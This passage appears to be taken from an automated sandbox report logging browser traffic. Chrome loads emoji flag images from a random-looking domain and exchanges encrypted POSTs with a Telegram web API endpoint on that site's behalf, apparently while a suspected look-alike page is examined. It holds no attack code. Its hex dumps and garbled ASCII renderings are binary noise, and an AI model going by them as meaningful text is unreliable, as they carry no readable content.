                                  2025-01-12 00:04:03 UTC486INData Raw: 53 4d 14 1b 2f 5d ba ce f9 73 7c ac 39 f1 6d 52 94 5c ce e2 51 3a 15 61 e7 36 87 96 68 33 23 b4 10 f1 80 87 37 68 7c de 44 70 f8 22 58 56 4f 87 20 ec 15 94 84 77 1e 2d 5e a9 d8 63 ac b5 b3 2a 68 a2 5d d1 10 45 a8 cc e8 db 2a d5 6e 6c 43 75 6d 6a 08 80 c0 ad 44 d6 94 46 05 03 30 7c 2f 3e fa 28 d2 85 3b 38 57 c4 5b 54 14 f2 5e 41 57 bc f4 58 f2 96 63 02 08 b9 40 71 54 1c 05 2a 11 a5 69 91 e7 e0 aa d9 4e 8d 76 10 ce 02 ad dc 4e 66 9a b6 98 15 ce a3 9a d8 21 b3 fe 20 86 af 9c 78 8f a8 86 bd 82 9e 0e 7a f5 86 37 62 4a 7e 13 32 de 80 46 f3 1c 10 00 03 08 30 a7 a9 31 b4 b1 9d b9 8d e9 d9 98 9a d7 1f a2 ba 3e c5 f5 71 39 fb d2 3c 28 fb 8a fa 3e a8 26 43 35 5b 46 33 89 a4 59 c9 d4 2b 80 52 a8 98 c7 93 a1 47 18 a8 6a 6d 6c 67 6e dc cc 9b 5f d6 a6 fc 59 5c 7f e9 e0
                                  Data Ascii: SM/]s|9mR\Q:a6h3#7h|Dp"XVO w-^c*h]E*nlCumjDF0|/>(;8W[T^AWXc@qT*iNvNf! xz7bJ~2F01>q9<(>&C5[F3Y+RGjmlgn_Y\


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  121192.168.2.650060172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC608OUTGET /img-apple-160/1f1e7-1f1e9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: image/png
                                  Content-Length: 4161
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1041"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wya8T%2B9vrjeaDH5hNoPVVFG67HEeAyuMoGCY4H7abE3iznH8lsJQKnm2cThDL3Sommvt%2FehqolNYEIXH69dSpn6G5EnjcWbmyU0ZLoH4Vtuz0TNsEhWKHq7vImV5OAd5vve6Jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30f59bf7c93-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1801&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1186&delivery_rate=1565683&cwnd=210&unsent_bytes=0&cid=4e8c1c78fa3c5c5f&ts=637&x=0"
                                  2025-01-12 00:04:03 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 3a 5e 54 14 3b 30 6b 8e 83 15 3d 31 6b 8c 82 18 3e 33 6c 8f 85 14 3b 2f 68 8a 80 74 96 8c 15 3c 30 15 3c 31 6e 90 86 15 3c 30 5b 80 75 72 94 8a 23 55 47 1d 47 3b 71 93 89 10 38 2c 36 65 58 5a 7f 74 6d 8f 85 22 4e 40 0c 3e 2f 68 8a 80 1b 42 37 0e 36 2a 68 8a 80 75 97 8d 6b 8d 83 44 6d 61 16 3d 32 70 92 88 5e 82 78 14 3b 30 6d 8e 84 19 40 35 73 95 8b 10 37 2b 69 8a 81 1b 42 37 10 36 2b 6f 91 87 39 64 58 1b 42 36 75 96 8c 0f 36 2b 62 85 7b 0f 35 2a 71 93 89 74 96 8c 70 93 88 6c 90 85 68 8e 83 67 8b 80 61 8e 80 5f 8b 7e 59 8d 7d 64 87 7d 5a 88 7b f1 4c 22 52 8b 7a d9 54 2e 5e 83 78 f6 47 1e c3 5c 37 d1 56 30 df 50 29 e8 4c 24 de
                                  Data Ascii: PNGIHDRPLTEGpL:^T;0k=1k>3l;/ht<0<1n<0[ur#UGG;q8,6eXZtm"N@>/hB76*hukDma=2p^x;0m@5s7+iB76+o9dXB6u6+b{5*qtplhga_~Y}d}Z{L"RzT.^xG\7V0P)L$
                                  2025-01-12 00:04:03 UTC1369INData Raw: 31 7c 66 63 67 4b 30 7b 65 3e 74 64 31 7a 64 2f 79 63 53 6a 4f 30 78 62 31 76 62 2d 78 62 23 7c 67 2d 77 61 16 80 6d 2c 77 60 32 74 5f 2c 76 60 36 71 5f 2b 75 5f 2c 74 5e 3e 6b 5d 29 74 5e 13 7d 69 2e 71 5c 29 73 5d 23 75 60 31 6e 5b 28 72 5c 26 72 5c 27 71 5b 14 78 64 27 70 5a 2e 6c 59 25 70 5a 28 6e 59 25 6f 59 18 74 60 25 6e 59 29 6c 58 23 6e 58 24 6d 58 2c 69 56 22 6d 57 24 6c 56 22 6d 56 25 6a 56 23 6b 55 21 6c 55 20 6b 55 2e 64 54 25 68 55 21 6a 54 1f 6a 54 20 69 54 26 66 52 20 68 53 1e 69 53 26 65 51 1e 68 52 1d 67 51 1d 66 51 29 60 50 1f 65 50 1b 66 50 1b 65 4f 1a 64 4e 1f 61 4e 25 5e 4d 19 63 4d 19 62 4c 25 5b 4b 17 62 4b 1c 5f 4b 17 61 4b 17 60 4b 16 60 4a 15 5f 49 22 58 48 1a 5c 48 15 5e 49 14 5e 48 14 5d 47 21 56 46 13 5d 46 22 55 46 13 5c 47
                                  Data Ascii: 1|fcgK0{e>td1zd/ycSjO0xb1vb-xb#|g-wam,w`2t_,v`6q_+u_,t^>k])t^}i.q\)s]#u`1n[(r\&r\'q[xd'pZ.lY%pZ(nY%oYt`%nY)lX#nX$mX,iV"mW$lV"mV%jV#kU!lU kU.dT%hU!jTjT iT&fR hSiS&eQhRgQfQ)`PePfPeOdNaN%^McMbL%[KbK_KaK`K`J_I"XH\H^I^H]G!VF]F"UF\G
                                  2025-01-12 00:04:03 UTC1369INData Raw: 40 50 7d e0 e9 7c 02 4e da 48 91 68 dd 87 87 8f a3 78 a5 63 a0 06 c8 93 8a 65 ba d6 77 93 1f 47 ab de 0c 89 aa f7 e7 49 9d 0b 30 2f 02 3d a8 00 90 4e c3 7c f4 24 c8 ef 3f dd de 86 d1 28 e2 ba 7b 5c 49 f7 be be 98 d5 fb 59 6e a9 38 9d d7 40 77 fb 4e 2f 47 c4 37 b6 f6 f8 52 42 02 21 a5 14 3f 17 42 a0 ad 5c fd cd ab b9 ed b6 6d 04 61 f8 9f d9 25 45 5a 56 ac c4 8e ed 38 b1 9a 14 28 1a a0 ed fb bf 46 0b e4 a2 28 7a 48 6d 27 cd 41 4e ed e8 44 91 7b 68 2a 8b 06 17 ab 25 23 c6 e1 77 23 d8 20 c7 1f ff d9 1d 52 a0 5f bc 3b 7b b2 9f 1a 78 18 71 f8 fe d7 97 b1 40 03 b6 ac 66 c0 2b 4b 5d d4 09 96 b1 e9 f5 27 59 6d 01 63 35 c1 83 e3 64 fc 22 4a be 9b de 94 77 30 9f c8 77 fb 7f 9f 59 35 47 15 63 b5 51 46 6b e5 46 e8 f4 4b 34 af 41 6d 61 d7 b6 04 6b 6c 39 01 2a 18 be f7
                                  Data Ascii: @P}|NHhxcewGI0/=N|$?({\IYn8@wN/G7RB!?B\ma%EZV8(F(zHm'AND{h*%#w# R_;{xq@f+K]'Ymc5d"Jw0wY5GcQFkFK4Amakl9*
                                  2025-01-12 00:04:03 UTC950INData Raw: cb 30 7e 3c c8 b2 25 33 aa 44 09 4d a7 fc f4 c7 83 c2 04 46 78 c3 40 23 0d 0f 19 ee ab d0 37 21 1a 80 84 d5 0c 99 33 d6 90 fe 61 fa b3 02 62 09 05 f0 7f ed db 4d 6f db 46 10 80 e1 77 67 96 5c 52 92 3f 12 bb 87 00 45 fe 86 5b b8 fd ff 87 d6 39 b6 f7 5e 0a b4 4d 03 47 b6 25 93 bb 33 85 25 2f 2a d7 32 ec 7e 05 39 f0 bd 08 02 74 78 34 43 10 5a 40 34 1a b3 15 cb f6 8b a3 93 fe e6 86 9a 16 b4 fe 8f fa 3e 71 05 74 47 56 79 6a f0 32 a0 14 36 69 7e f2 a7 21 96 67 df bc ff 21 7e 5c 8f f9 cd fb 37 bf e6 c8 c1 87 d3 d3 c3 45 7f bd e5 29 f5 a5 5b 03 01 09 d2 29 5d 62 4e 27 51 35 36 96 40 62 a5 7a 10 5e 0a 44 73 70 80 80 f3 44 62 a3 bf fa 76 79 79 f9 7b 58 2e 96 1d dd eb a3 b7 de af ed 26 54 1b 1b 5b c7 9d c7 fb 86 cd 73 06 31 35 b1 8b d0 b6 d0 45 a0 aa cc 42 5c a1 d0
                                  Data Ascii: 0~<%3DMFx@#7!3abMoFwg\R?E[9^MG%3%/*2~9tx4CZ@4>qtGVyj26i~!g!~\7E)[)]bN'Q56@bz^DspDbvyy{X.&T[s15EB\


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  122192.168.2.650059149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 232
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC232OUTData Raw: 2a 10 06 78 25 cb 00 4d 8b c2 25 6d 79 be 06 67 2a fe 14 86 b9 dd fe 4b 30 27 12 7a 57 cb b1 ed 2b a2 26 7c ab c0 1a 78 3b a5 40 bc 8c 64 7a a6 b1 4b e4 ea 68 2c 21 00 5c a7 fd 93 71 d8 9d 3c 89 70 bd 01 40 dd 8d 19 84 29 ca 84 29 c6 de 81 b3 41 89 71 7d c6 f5 95 72 b2 5c d5 17 02 c9 07 be b9 8f 30 dd 62 aa 9b c2 50 4c 25 6f ff 98 90 22 ca 81 a0 80 6f 42 be e5 62 8e f5 89 a7 b4 56 4e 8d 3b a1 e5 c3 4b 1d f1 fc 52 2d ed 73 1b 04 69 0f 4d 1e 23 8d 82 74 e2 1f 8b 66 c0 d9 2b 50 9e b0 cf 6a 05 8a 95 96 f7 5e e9 58 ca f6 ac 7f c6 20 bd 8e 67 c9 60 7f a5 2b 49 10 82 32 27 57 e8 06 9a c1 1c ea cb 55 8b 5f 1b 00 aa d4 b2 d1 9b 6d 6f 5f 15 4c d9 49 b2 b6 47 a1 58 e9 2a 2c 4b a9 38 30 3b 82 aa 75
                                  Data Ascii: *x%M%myg*K0'zW+&|x;@dzKh,!\q<p@))Aq}r\0bPL%o"oBbVN;KR-siM#tf+Pj^X g`+I2'WU_mo_LIGX*,K80;u
                                  2025-01-12 00:04:03 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:03 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 61 6e 1f ff 97 9c 5b 4b d9 08 d3 cf 96 d9 0c 50 83 00 c5 75 7f 20 7f cc 07 2d 0b 83 4c d0 58 35 fa 72 96 03 35 7d 97 17 6a 67 25 b8 8f 3a a2 d1 6e d5 43 9a 1c 44 ab 59 43 56 46 f4 76 c3 39 66 79 45 1a b3 8e 04 e8 6c a3 11 54 00 7e 53 5d 11
                                  Data Ascii: *x%Man[KPu -LX5r5}jg%:nCDYCVFv9fyElT~S]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  123192.168.2.650065149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d b0 e1 77 7d 92 cc 1a 31 f6 50 d5 e7 f7 aa 7a 6d 20 44 42 57 f4 13 59 c9 0d 04 31 6c 78 84 f4 7a ed 59 cb 31 e5 a6 da 6a 0c 1f a2 36 72 f5 b4 9b 7f b4 37 5a fc a6 ed 35 c2 a4 7e 6c a7 4b 43 e2 44 b3 74 50 13 6f 7f d2 54 08 67 44 9a 07 01 30
                                  Data Ascii: *x%Mw}1Pzm DBWY1lxzY1j6r7Z5~lKCDtPoTgD0
                                  2025-01-12 00:04:03 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:03 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 80 09 83 df 44 42 75 9b 8a 24 42 9f 87 41 18 f8 67 81 93 71 28 4a 7e 05 c7 4e 61 a4 16 28 14 6b 1f 70 74 e3 64 75 bf 64 57 9e 50 9f 15 03 bb d6 69 d3 b4 36 c0 f5 ab fb 9e 9e a1 dc 68 70 48 c1 03 fc e4 43 bf cd 88 36 80 af b3 8d a4 b8 ca 6f
                                  Data Ascii: *x%MDBu$BAgq(J~Na(kptdudWPi6hpHC6o


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  124192.168.2.650072149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:03 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  125192.168.2.650079172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC370OUTGET /img-apple-160/1f1e6-1f1fa.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: image/png
                                  Content-Length: 6383
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-18ef"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8C3ubQF4vPTpdOuJd4VnpkQIUbx16Y7s%2FsV%2FGftlBNirEkemaZkIWp93wANO6rrWo8YTqGE6GVIdboKPBWPJG70xLwFRXFQIAwFfLkV4KN2r3XGWtSnPNMg%2F%2FgbHVXO7u%2BLTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e313fdc043fe-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2140&min_rtt=1665&rtt_var=963&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1753753&cwnd=236&unsent_bytes=0&cid=7f091019f62054a2&ts=132&x=0"
                                  2025-01-12 00:04:03 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 71 7e 9a 0e 21 48 c0 8b 91 24 28 4c 78 75 92 0b 1d 42 ca cc cc 0b 1e 44 67 77 98 0f 22 48 ba 5d 69 66 77 98 c2 bd c0 0b 1e 43 60 71 92 17 2f 5f c1 6e 79 0c 1e 44 08 1a 40 63 74 95 a6 ad aa 02 19 47 8e 8a 8d c7 74 7e 87 09 18 81 4b 5a 67 78 99 0c 20 45 60 70 91 c2 a1 a4 63 74 95 c5 71 7d 0b 1e 43 bc bd c1 ca d5 d5 6a 7b 9b 60 70 91 0d 1f 45 c1 6a 75 6a 7a 9b 9d 2e 3c 0c 1f 44 6c 7d 9e 5e 6f 90 0b 1e 43 a8 55 5f c9 d4 dd c5 c4 c5 3e 54 7f c0 6e 79 82 93 b5 fc fb fa f1 ff fc fb f8 f4 e5 ff fe f5 f7 f7 f9 f3 ec f3 f2 f2 e1 f8 f7 f0 f0 ef ec ed ee de f1 ef f7 e3 e4 e9 e9 e7 d9 eb e8 e5 e5 e3 f2 d9 db e0 e0 e0 f6 ce d2 f9 c2 c8 df
                                  Data Ascii: PNGIHDRPLTEGpLq~!H$(LxuBDgw"H]ifwC`q/_nyD@ctGt~KZgx E`pctq}Cj{`pEjujz.<Dl}^oCU_>Tny
                                  2025-01-12 00:04:03 UTC1369INData Raw: 49 8e d9 03 1e 23 48 8f d0 05 1f 22 47 8e b7 0f 25 21 45 8d 20 44 8a 1f 44 8c 1f 43 8a c9 02 18 1d 42 89 c0 01 16 1a 3f 87 ab 08 1a 19 3d 84 17 3c 84 05 3f 8c 99 08 19 1a 37 6f 0f 38 85 12 36 7e 1b 35 6a 10 35 7c 10 34 7a 19 32 64 15 32 69 0e 32 7a 09 32 81 86 07 16 0d 31 78 0b 30 77 15 2e 5f 0a 2e 75 14 2c 5a 07 2c 73 03 2c 7b 0c 2b 67 07 2b 70 05 2a 71 12 29 54 59 0c 29 05 29 6f 04 28 6d 0a 27 60 12 26 4d 00 26 77 03 26 6c 01 25 6c 02 25 69 09 23 56 00 22 70 00 23 69 01 22 63 0c 20 49 00 1e 6b 01 20 5c 01 1d 54 08 1c 43 00 18 65 01 1a 4a 04 18 3e 00 18 48 00 10 60 00 15 41 01 14 3a 00 05 56 00 08 42 51 69 9a 33 46 6f 1f 3f 7d 5b 6d 90 5f 71 95 47 62 97 69 7a 9c 35 4e 80 2a 4b 8a bf 62 6e 45 5a 85 39 54 88 63 75 99 c5 8b 92 19 3a 7a 0f 2f 70 1c 39 73 c8
                                  Data Ascii: I#H"G%!E DDCB?=<?7o86~5j5|4z2d2i2z21x0w._.u,Z,s,{+g+p*q)TY))o(m'`&M&w&l%l%i#V"p#i"c Ik \TCeJ>H`A:VBQi3Fo?}[m_qGbiz5N*KbnEZ9Tcu:z/p9s
                                  2025-01-12 00:04:03 UTC1369INData Raw: 79 76 37 c0 99 f1 d8 9d 8c c3 a1 e2 11 74 ef 42 46 ae 31 58 b8 86 99 a8 2a 50 e7 46 21 9f f4 a5 0e 54 9b 80 35 9b 80 d7 bb db ac f2 10 81 63 41 2e 18 a7 8c 1e 20 9c e4 76 df 4b 0c c0 1f 06 9f 8b f8 13 7b ae 94 96 66 04 4e 58 ad 36 47 e0 bd b9 b9 07 74 c0 32 6a 99 70 1e cb a0 93 9d 9d 73 84 13 33 3d 6a 47 69 9a 8f c1 71 4d 68 5a 71 41 49 7a 28 f8 42 32 3b b5 e5 5e 40 a8 90 de 84 5a 17 b0 f9 3a 35 c2 c7 04 0e c1 c2 94 d9 e8 d9 83 c6 1d 81 7f f9 7e f0 bf c4 21 61 c9 8d 15 15 85 4e 9e c3 6a 13 08 24 a3 4f e7 46 5d 99 1b 0e 73 16 66 83 0d 02 47 81 15 d3 0c 8f c2 ec 5a e7 cc 12 ae d1 44 e6 15 ab 8a 13 83 e8 e5 ed ac bd f8 c6 76 11 05 55 b8 01 b8 d2 4a 8c 27 f1 f9 00 e4 4b ff 4a 11 46 bf 81 df ff e5 cf e6 ef 24 1c de c3 8a c6 8a 73 0f 79 13 36 9b 03 b3 29 27 1f
                                  Data Ascii: yv7tBF1X*PF!T5cA. vK{fNX6Gt2jps3=jGiqMhZqAIz(B2;^@Z:5~!aNj$OF]sfGZDvUJ'KJF$sy6)'
                                  2025-01-12 00:04:03 UTC1369INData Raw: 5d 1c ff e9 27 5f a0 6b d0 bb 41 20 6e 6a d0 b3 c2 27 54 ea e2 12 da 16 1b 19 4a db 02 24 0a cb 2c cc ab 3a 6d 2d b4 e7 05 7c 7d 75 1b 20 31 cd b0 c1 5c c2 67 25 11 8f 7c 00 df bf 73 c8 ea d8 ff 30 a3 b4 11 52 5f e1 d5 a0 37 b0 04 a2 2a c8 f2 f4 86 b3 c5 99 f6 4a 1d d8 1a dc 2b bb 19 58 5b a7 b0 5f 7b a9 6f ba e6 03 48 ce 25 09 6d 30 38 71 c4 af 6e dd f0 35 0f fe f1 b6 42 c8 65 86 3b 93 0f 1f 2b ad 70 df 80 65 65 9e 4d 78 b6 78 c3 12 43 6b d1 91 e1 68 8e d6 2c 44 1d 8c 82 d1 f5 00 63 46 a7 6f aa 2c 07 91 37 b0 bc 49 a7 9b c5 32 89 97 96 aa 15 9f 4b 4c 51 f7 38 1c cc 21 b7 fd f8 9d af 89 fa 87 41 f3 ad 1f 15 42 1e 93 c9 0a dd 0f cc ec a3 27 4f 9e 39 5b 56 0d 41 d0 33 6f 1a 2c ce da ab a1 c3 8e 4d cf 57 c1 18 93 1e 8b d6 38 00 19 1b 2e 78 03 2b 6b 94 96 5e
                                  Data Ascii: ]'_kA nj'TJ$,:m-|}u 1\g%|s0R_7*J+X[_{oH%m08qn5Be;+peeMxxCkh,DcFo,7I2KLQ8!AB'O9[VA3o,MW8.x+k^
                                  2025-01-12 00:04:03 UTC1369INData Raw: 16 0c 5c 53 5a 8c 01 60 7a 9e 13 38 a1 94 35 d2 a8 ef dc b9 f0 ec 33 db b9 73 3d bd eb 69 51 80 59 64 32 d9 3d 50 8b 41 60 96 cb 66 8d f5 41 18 43 cc 6c 38 86 5c 5b 25 51 e4 16 e7 17 e6 cf 06 a8 9e c5 c6 80 8f 7e cf 09 9c 28 0a 30 f3 59 5c e8 00 04 de c5 8b 63 63 5f 20 fb fb 00 3e 7c f0 40 e9 47 e9 e3 81 3f 7c fe eb 18 e4 e2 57 5f 7f 77 e9 02 35 4a bf 17 20 7c 61 ed 00 4c 56 ff 7c f6 db a5 5f c6 c7 c7 2b 8f 03 d3 d3 4c 54 fe c0 80 b4 24 d1 a1 69 35 81 40 1d ae e1 1f 1a 90 66 c2 a1 5a 2d 18 84 91 e5 07 0a 94 24 e9 ff 0a 54 7c a7 06 9c a2 a5 fa 3b 01 a5 ff 18 48 af ad d5 4e 00 f4 7a 7d 67 04 cc f4 ba 18 43 c0 1f 0f 73 a6 40 89 e9 19 64 a6 3a 03 35 da 7b 02 c6 65 62 20 40 03 10 7c a1 a0 57 07 d4 6c c6 80 30 5b d2 0d 72 ba 07 c2 d7 ad f8 11 20 3b 8a 4c 79 06
                                  Data Ascii: \SZ`z853s=iQYd2=PA`fACl8\[%Q~(0Y\cc_ >|@G?|W_w5J |aLV|_+LT$i5@fZ-$T|;HNz}gCs@d:5{eb @|Wl0[r ;Ly
                                  2025-01-12 00:04:03 UTC439INData Raw: de f6 39 f0 77 d7 a4 37 36 a4 75 36 d2 29 c4 51 6f 57 ab cb 42 a9 3c 7f 6c 7e 3d 00 ac 3a 20 8f f0 10 47 c8 c0 47 d3 cf b7 8e 75 43 ef 67 de 4f da 09 1a e3 84 69 6c 6b 69 29 d2 28 95 c4 91 0c 7d 57 38 26 1b 72 84 eb f9 41 28 a3 04 89 65 59 14 2a cb b3 2c 4d 07 80 3c c2 57 2d 10 32 c0 7d 23 9c 3d 3c bd fd 74 da 20 f0 8e de 3b c3 c0 c8 32 a6 7d ea 6d 14 23 d7 86 70 c6 a3 c1 6c d7 97 71 82 42 a5 40 b8 16 58 d7 d5 62 41 07 7f fe 24 24 e0 3e 01 a7 fa 70 4f 6b 12 9a de b5 81 cc d0 fe b6 45 32 70 1d 7b 74 c1 c6 c2 93 09 0a 07 80 20 5c f2 c1 e3 14 79 86 e6 f5 07 00 4d fa 8b d6 1f 7a b1 8c 68 07 1d 2d 89 42 4f 0c d3 86 91 ae 8c 61 84 de 1a 60 08 c0 b2 82 83 27 23 20 e7 10 18 f1 bb 37 d3 0c 9e b3 f8 55 14 b4 f3 6d 07 ba 8f 32 a4 75 b6 58 86 1b dd 3a 2f 9f 25 c2 78
                                  Data Ascii: 9w76u6)QoWB<l~=: GGuCgOilki)(}W8&rA(eY*,M<W-2}#=<t ;2}m#plqB@XbA$$>pOkE2p{t \yMzh-BOa`'# 7Um2uX:/%x


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  126192.168.2.650078172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC608OUTGET /img-apple-160/1f1e7-1f1e7.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
